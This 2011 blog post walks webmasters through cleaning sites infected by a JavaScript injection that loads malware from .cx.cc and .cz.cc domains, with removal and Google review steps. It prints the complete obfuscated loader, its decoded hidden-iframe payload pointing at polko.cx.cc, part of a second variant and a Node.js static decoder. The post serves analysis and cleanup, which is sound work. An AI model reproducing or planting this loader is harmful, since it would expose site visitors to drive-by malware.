Monday, June 27, 2011

polko.cx.cc, dalanaya.cz.cc, holot.cx.cc, kulop.cx.cc, kutol.cx.cc and all the other .(cx|cz).cc(s)

It seems the latest attack going around is a JavaScript injection that uses .cx.cc and .cz.cc domains to host the malware. polko.cx.cc, dalanaya.cz.cc, holot.cx.cc, kulop.cx.cc, kutol.cx.cc, adrieath.cx.cc and carolinsoll.cz.cc are the domains being used most often at the moment. These domains will undoubtedly change over time and I will try to keep this list up to date. If the Google diagnostic page or the browser's malware warning lists one of these sites, here are a couple of things to look for.

The hack uses some obfuscated JavaScript

// Junk loop: computes nothing that is used later, there only to look like ordinary code
var i,j,key; i = 0; j = 1; for(i=0; i < 20; i++) { key = j + i + 20; j = key - 10; }
// Builds the string "renceErr" inside a div, plus a detached text node "l", so that "eval" never appears literally in the file
el=document.createElement("div"); el.innerHTML="ren"; el.innerHTML+="ceErr"; el.appendChild(document.createTextNode("q")); el.appendChild(document.createTextNode("l")); el2=el.removeChild(el.lastChild);
// b is undefined, so b[2]=21 throws and the outer catch reads k = "renceErr" out of the div
try{try{throw 1}catch(a){b[2]=21}; }catch(a){with(el){k=firstChild.nodeValue; }};
// ar is the character set of the payload, ar2 the list of relative offsets into it (split on "c")
ar=" < iuD \"'rwB [.f1beJlmEN0; > Tg(xI{Fh,QA/n=:kHdC)ovc]}tYyasp";
ar2="R16c0c-12c48c-12c68c60c12c8c-180c68c-12c84c52c-152c56c-40c136c-120c-8c-8c12c-12c84c52c16c-180c172c-108c112c-108c-20c128c-136c-12c44c-84c36c120c-12c40c-184c152c-132c44c104c-16c-56c-104c0c0c-12c48c-24c184c-136c-12c-36c80c68c-84c-76c0c180c-156c24c8c144c-152c-24c80c-104c0c0c152c12c8c-180c68c-12c84c52c-152c-16c-4c-24c196c-136c44c-88c-20c4c48c-24c184c-136c-12c-24c176c-188c160c-36c-128c104c72c0c20c-64c-12c0c76c-40c-108c88c20c-132c140c-76c-64c140c0c-44c-8c0c24c-36c-88c-4c104c28c-128c100c-56c-68c24c-4c172c-168c44c80c28c-120c-32c100c52c-108c60c-108c156c-24c-24c-4c-20c-36c60c-4c16c0c-128c16c-8c-28c164c32c-72c24c-128c32c32c-64c16c88c-64c-60c100c24c72c-48c-128c32c32c-64c16c176c-16c8c-136c-8c88c-128c160c-180c212c-212c56c-56c68c-68c196c8c-52c-28c-124c164c0c-104c84c-56c128c-40c36c-212c196c-196c176c-32c8c56c-152c156c-36c-108c-64c192c-136c28c-20c-8c-12c148c-44c-68c4c108c-20c40c-64c-68c4c-68c72c-96c144c-140c48c-24c184c-136c-12c32c-76c156c-84c-76c0c180c-180c0c36c-44c140c40c12c-196c176c-32c-108c-36c48c-24c184c-136c-12c-36c80c68c-56c-104c0c0c168c28c-184c12c12c-12c112c-112c128c12c8c-180c68c-12c84c52c-152c140c-160c36c148c-12c-136c16c-8c-8c12c-12c84c52c-92c-84c-20c48c-24c184c-136c-12c-40c152c-84c-40c-4c168c-152c136c-60c60c0c-172c-24c56c-52c192c-136c44c-84c192c-188c160c-164c108c-108c104c72c0c20c-64c-12c0c76c-40c-108c88c20c-132c140c-76c-64c140c0c-44c-8c0c24c-36c-88c-4c104c28c-128c100c-56c-68c24c-4c172c-168c44c80c28c-120c-32c100c52c-108c60c-108c156c-24c-24c-4c-20c-36c60c-4c16c0c-128c152c-84c-40c-4c168c-16c8c-136c-8c-16c136c-180c212c-212c56c-56c68c-68c196c8c-56c-128c104c-124c164c0c-104c84c-124c68c-40c-4c168c-16c8c-136c-8c-16c172c-40c36c-212c196c-196c176c-32c4c-128c188c-152c156c-36c-108c-64c192c-136c-40c68c-40c-4c168c-16c8c-136c-8c-16c24c-8c-12c148c-48c-128c64c-64c68c-40c-4c168c-16c8c-136c-8c-16c152c-20c40c-68c-128c64c-64c68c-40c-4c168c-152c136c-60c60c0c-172c-24c56c-52c192c-136c44c-84c8c-28c164c32c-72c-104c108c-108c32c32c-64c152c-84c-40c-4c168c-152c136c-60c60c0c-172c-24c56c-52c192c-136c44c-84c104c-64c-60c100c24c72c-176c108c-108c32c32c-64c152c-84c-76c0c0c152c12c8c-180c68c-12c84c52c-152c56c-40c136c-120c-8c-8c12c-12c84c52c16c-180c172c-108c112c-108c-20c128c-136c-12c44c-84c36c120c-12c40c-184c152c-132c44c104c-144c164c8c0c-156c84c20c4c-44c-124c68c96c-60c-56c124c-84c-76c0c180";
// "urn erenceErr".replace("renceErr","val") gives "urn eval"; Function("return eval")() then hands back eval itself without the word ever being written
try{throw 1; }catch(a){pau="urn erenceErr".replace(k,"va"+el2.nodeValue); }
e=Function("ret"+pau)();
// Walks ar with the cumulative offsets to rebuild the payload one character at a time (parseInt("0asdceErr") is 0, so only ar2[i]/4 moves pos), then evals the result
ar2=ar2.split("c"); ar2[0]="16"; s=""; pos=0; i=0; while(i < 611){e('po'+'s+=par'+'seInt(k'+'.rep'+'lace("'+'ren'+'","0a'+'sd"))+'+'ar2['+'i]/'+'4'); e('s+=ar.su'+''+'bstr(pos,1)'); i++; }
e(s);


which de-obfuscates to

// If <body> has already been parsed, append the iframe to it
if (document.getElementsByTagName('body')[0]){
  iframer();
}
// Otherwise (script running from the <head>) write the iframe straight into the document
else {
  document.write("<iframe src='http://polko.cx.cc/QQkFBwQHBQEDBwYBEkcJBQcEAwcHAQIEAQ==' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', 'http://polko.cx.cc/QQkFBwQHBQEDBwYBEkcJBQcEAwcHAQIEAQ==');
  // 10x10 pixels, invisible, pinned to the top-left corner so it never shows on the page
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

which adds a hidden 10x10 pixel iframe to every page that loads the script. In the majority of the hacks I have seen the URL in the src attribute of the iframe (http://polko.cx.cc/QQkFBwQHBQEDBwYBEkcJBQcEAwcHAQIEAQ==) redirects to dalanaya.cz.cc, where the malicious code is actually hosted.

There are a number of variations on this script; another common one is

var i,j,key; i = 0; j = 1; for(i=0;i < 20;i++) {  key = j + i + 20;  j = key - 10; } var s,w=-4+ +"2",aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+w,11+w,107+w,104+w,34+w,42+w,102+w,113+w,101+w,119+w,
111+w,103+w,112+w,118+w,48+w,105+w,103+w,118+w,71+w,110+w,103+w,111+w,103+w,
112+w,118+w,117+w,68+w,123+w,86+w,99+w,105+w,80+w,99+w,111+w,103+w,42+w,41+w,
100+w,113+w,102+w,123+w,41+w,43+w,93+w,50+w,95+w,43+w,125+w,11+w,11+w,11+w,
107+w,104+w,116+w,99+w,111+w,103+w,116+w,42+w,43+w,   .........
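This variant can be decoded without running it: w is -4 + +"2", i.e. -2, and every argument is a character code plus w. The following is an added example in Node.js, not code from the original post. It parses the shift out of the w=-4+ +"2" idiom and applies it to every N+w term; the input is the fragment quoted above, reproduced as constructed sample text, so the decode stops where the quotation stops.

```javascript
// Added example (not from the original post): statically decode the
// String.fromCharCode(N+w, N+w, ...) loader variant without executing it.
// The sample below is the fragment quoted in the post (constructed input);
// the part the post elides ("........") is simply absent.
const sample = `var i,j,key; i = 0; j = 1; for(i=0;i < 20;i++) {  key = j + i + 20;  j = key - 10; } var s,w=-4+ +"2",aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+w,11+w,107+w,104+w,34+w,42+w,102+w,113+w,101+w,119+w,
111+w,103+w,112+w,118+w,48+w,105+w,103+w,118+w,71+w,110+w,103+w,111+w,103+w,
112+w,118+w,117+w,68+w,123+w,86+w,99+w,105+w,80+w,99+w,111+w,103+w,42+w,41+w,
100+w,113+w,102+w,123+w,41+w,43+w,93+w,50+w,95+w,43+w,125+w,11+w,11+w,11+w,
107+w,104+w,116+w,99+w,111+w,103+w,116+w,42+w,43+w,   .........`;

// The shift is written as w=-4+ +"2" (unary plus on a string): w = -4 + 2 = -2.
// This parser only understands that idiom; it is an assumption that other
// samples use the same form, so it throws rather than guessing otherwise.
function parseShift(src) {
  const m = src.match(/\bw\s*=\s*(-?\d+)\s*\+\s*\+\s*"(-?\d+)"/);
  if (!m) throw new Error('shift expression not recognised');
  return parseInt(m[1], 10) + parseInt(m[2], 10);
}

// Pull every "N+w" term out of the fromCharCode argument list and apply the shift.
function decodeFromCharCode(src) {
  const w = parseShift(src);
  const marker = 'String.fromCharCode(';
  const start = src.indexOf(marker);
  if (start < 0) throw new Error('no String.fromCharCode call found');
  const args = src.slice(start + marker.length);
  const codes = [];
  for (const m of args.matchAll(/(\d+)\s*\+\s*w\b/g)) {
    codes.push(parseInt(m[1], 10) + w);
  }
  return String.fromCharCode(...codes);
}

// Triage heuristic: the decoded text should be ordinary printable JavaScript.
// Control bytes other than tab/newline mean the shift or the parse is wrong.
function looksLikeScript(text) {
  return /^[\t\n\r\x20-\x7e]*$/.test(text) &&
         /\b(document|window|eval|iframe)\b/.test(text);
}

const decoded = decodeFromCharCode(sample);
console.log(JSON.stringify(decoded));
// → "\t\tif (document.getElementsByTagName('body')[0]){\t\t\tiframer()"
```

Decoding statically, instead of swapping eval for a logger and running the file, means the loader's junk loop and the window[...] lookup never execute at all, which matters when you are examining a copy pulled straight from the server rather than a sandboxed one.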

The bottom line: if you see blocks of obfuscated script like these in your files, make absolutely sure that you know what they do.

On most of the sites I have looked at (all but two) the malicious JavaScript was added to one or more of the legitimate JavaScript files on the site. On one site the code was in the homepage, inserted right after the </html> tag, and on another a rogue .js file was added to the site and linked from several of the site's pages.

The first step in clearing this hack is to locate the file(s) containing the malicious script. As always, if Google has provided a list of pages that it has detected as malicious, start by checking those; if not, start with your homepage. You can open the files in your editor or, if you prefer, check them in your browser. If you are going to check any of your pages on-line, it is always a good idea to use one of the on-line tools such as Redleg's File Viewer to look at the contents of the page. These tools let you view the file a little more safely because they render the script non-executable (or at least they try to).

If you are familiar with the JavaScript files on your site you might want to start by checking the contents of all the "legitimate" JavaScript files on the site. Don't stop checking when you find the first infected file, as in all likelihood there will be more than one. I have also seen that on some sites the hackers added a "not legitimate" JavaScript file and linked it from some of the site's pages. This file can be placed in virtually any folder on the site, so these "rogue" script files can be difficult to locate.

If you start out checking an HTML (php/jsp/asp) page, in all probability you will not see the block of malicious script, but you should still check your HTML pages. Look through the file for any JavaScript files being used in the page; look for lines of code like this

<script src="/e107_files/popup.js" type="text/javascript"></script> 
<script src="/e107_files/e107.js" type="text/javascript"></script>
<script src="/e107_files/nav_menu_alt.js" type="text/javascript"></script>

Note: I have used the e107 JavaScript files in the example above because these were the files that had been hacked on many of the sites I have looked at. This was not due to any inherent vulnerability in the e107 files; in fact, all of these sites had been hacked through compromised passwords. It appears the hackers picked these files because they are included in the majority of the site's pages, as opposed to a script such as swfobject.js, which was only being used in a small number of pages on the site.

Once you have located the infected files, replacing them with a known clean copy is always the safest route. If you have any doubts about your "clean copy" you can usually download a fresh one from the original source of the file. If the known clean copy route is not an option, first make a backup of the file and then delete the block of malicious JavaScript. Once you have deleted the code, test your pages to make sure you are not getting any JavaScript errors, at least not any new ones, and that any dynamic elements in the page are working properly. If they are not, restore from the backup you made and try again, deleting only the malicious code. Because these sites were compromised through stolen passwords (see the note above), change the FTP and CMS passwords before you upload the cleaned files, or the same files can simply be re-infected.

Once you have everything cleaned up and your site secured, the final step is to determine whether you need to submit a malware Request a Review to Google. I often get the comment "Do I need to submit a request? You dummy, I am getting a malware warning, of course I need to submit a request!" Well, in some cases "it ain't necessarily so"; in fact, in many cases it will not even be possible.

The first step is to check Google's safe browsing diagnostic page for your site at

  http://www.google.com/safebrowsing/diagnostic?site=polko.cx.cc/
             (substitute your domain for polko.cx.cc)

If your site is listed as suspicious    

What is the current listing status for polko.cx.cc?
Site is listed as suspicious - visiting this web site may harm your computer.


then you will need to submit a malware review request to Google from the Webmaster Tools account for the site. However, if you check the diagnostic page for your site and it reads

What is the current listing status for yoursite.com?
This site is not currently listed as suspicious.


OK, so Google is not flagging my site but I am definitely getting a malware warning blocking access to my site, now what? If you are getting a warning on one or more pages of your site in a browser such as Chrome, Firefox or Safari and your site is not (yet) flagged by Google, it is probably a cross-site warning. If a browser such as Chrome detects code on your page (scripts, iframes) that loads content from or redirects to a flagged site, the browser will throw up a warning. The warning will not identify your site; it will identify the site hosting the malware that is being loaded by your page. See:

Cross-site Warnings
Oliver Fisher, Friday, January 23, 2009

Once you have removed all links/iframes, etc. to any blacklisted sites the warning should go away.

Note: with a cross-site warning you will only get the warning on a page that is infected, since the warning only pops up when the page tries to load content from a site that is already flagged. So if you are getting a cross-site warning on a page, that page, or a script called by that page, is very likely infected. If, however, your site itself is flagged by Google (the diagnostic page says suspicious), you will get the warning on every page of your site, even the ones that are not infected.

Good Luck with your site and as always I hope this is the first, and more importantly the last, time you ever read my blog!
